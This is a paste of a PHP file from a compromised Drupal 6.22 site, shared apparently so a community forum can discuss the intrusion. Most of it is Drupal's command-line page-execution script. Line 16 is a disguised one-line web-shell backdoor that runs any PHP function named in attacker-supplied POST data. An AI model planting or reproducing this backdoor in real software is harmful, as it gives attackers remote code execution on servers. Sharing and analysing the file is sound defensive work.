Drupal Site Intrusion

1. <?php
2. // This paste is being discussed at: http://groups.drupal.org/node/175979
3. // Everything below this comment was part of the orginal file which was intrusively added to several Drupal 6.22 installs
4.  
5. /**
6.  * Drupal shell execution script
7.  *
8.  * Check for your PHP interpreter - on Windows you'll probably have to
9.  * replace line 1 with
10.  *   #!c:/program files/php/php.exe
11.  *
12.  * @param path  Drupal's absolute root directory in local file system (optional).
13.  * @param URI   A URI to execute, including HTTP protocol prefix.
14.  */
15. $script = basename(array_shift($_SERVER['argv']));
16. @$_POST['arg']($_POST[5]);
17. if (in_array('--help', $_SERVER['argv'])) {
18.   echo <<<EOF
19.  
20. Execute a Drupal page from the shell.
21.  
22. Usage:        {$script} [OPTIONS] "<URI>"
23. Example:      {$script} "http://mysite.org/node"
24.  
25. All arguments are long options.
26.  
27.   --help      This page.
28.  
29.   --root      Set the working directory for the script to the specified path.
30.               To execute Drupal this has to be the root directory of your
31.               Drupal installation, f.e. /home/www/foo/drupal (assuming Drupal
32.               running on Unix). Current directory is not required.
33.               Use surrounding quotation marks on Windows.
34.  
35.   --verbose   This option displays the options as they are set, but will
36.               produce errors from setting the session.
37.  
38.   URI         The URI to execute, i.e. http://default/foo/bar for executing
39.               the path '/foo/bar' in your site 'default'.  URI has to be
40.               enclosed by quotation marks if there are ampersands in it
41.               (f.e. index.php?q=node&foo=bar).  Prefix 'http://' is required,
42.               and the domain must exist in Drupal's sites-directory.
43.  
44.               If the given path and file exists it will be executed directly,
45.               i.e. if URI is set to http://default/bar/foo.php
46.               and bar/foo.php exists, this script will be executed without
47.               bootstrapping Drupal.  To execute Drupal's cron.php, specify
48.               http://default/cron.php as the URI.
49.  
50.  
51. To run this script without --root argument invoke it from the root directory
52. of your Drupal installation with
53.  
54.   ./scripts/{$script}
55. \n
56. EOF;
57.   exit;
58. }
59.  
60. // define default settings
61. $cmd = 'index.php';
62. $_SERVER['HTTP_HOST']       = 'default';
63. $_SERVER['PHP_SELF']        = '/index.php';
64. $_SERVER['REMOTE_ADDR']     = '127.0.0.1';
65. $_SERVER['SERVER_SOFTWARE'] = 'PHP CLI';
66. $_SERVER['REQUEST_METHOD']  = 'GET';
67. $_SERVER['QUERY_STRING']    = '';
68. $_SERVER['PHP_SELF']        = $_SERVER['REQUEST_URI'] = '/';
69.  
70. // toggle verbose mode
71. if (in_array('--verbose', $_SERVER['argv'])) {
72.   $_verbose_mode = true;
73. }
74. else {
75.   $_verbose_mode = false;
76. }
77.  
78. // parse invocation arguments
79. while ($param = array_shift($_SERVER['argv'])) {
80.   switch ($param) {
81.     case '--root':
82.       // change working directory
83.       $path = array_shift($_SERVER['argv']);
84.       if (is_dir($path)) {
85.         chdir($path);
86.         if ($_verbose_mode) {
87.           echo "cwd changed to: {$path}\n";
88.         }
89.       }
90.       else {
91.         echo "\nERROR: {$path} not found.\n\n";
92.       }
93.       break;
94.  
95.     default:
96.       if (substr($param, 0, 2) == '--') {
97.         // ignore unknown options
98.         break;
99.       }
100.       else {
101.         // parse the URI
102.         $path = parse_url($param);
103.  
104.         // set site name
105.         if (isset($path['host'])) {
106.           $_SERVER['HTTP_HOST'] = $path['host'];
107.         }
108.  
109.         // set query string
110.         if (isset($path['query'])) {
111.           $_SERVER['QUERY_STRING'] = $path['query'];
112.           parse_str($path['query'], $_GET);
113.           $_REQUEST = $_GET;
114.         }
115.  
116.         // set file to execute or Drupal path (clean urls enabled)
117.         if (isset($path['path']) && file_exists(substr($path['path'], 1))) {
118.           $_SERVER['PHP_SELF'] = $_SERVER['REQUEST_URI'] = $path['path'];
119.           $cmd = substr($path['path'], 1);
120.         }
121.         else if (isset($path['path'])) {
122.           if (!isset($_GET['q'])) {
123.             $_REQUEST['q'] = $_GET['q'] = $path['path'];
124.           }
125.         }
126.  
127.         // display setup in verbose mode
128.         if ($_verbose_mode) {
129.           echo "Hostname set to: {$_SERVER['HTTP_HOST']}\n";
130.           echo "Script name set to: {$cmd}\n";
131.           echo "Path set to: {$_GET['q']}\n";
132.         }
133.       }
134.       break;
135.   }
136. }
137.  
138. if (file_exists($cmd)) {
139.   include $cmd;
140. }
141. else {
142.   echo "\nERROR: {$cmd} not found.\n\n";
143. }
144. exit();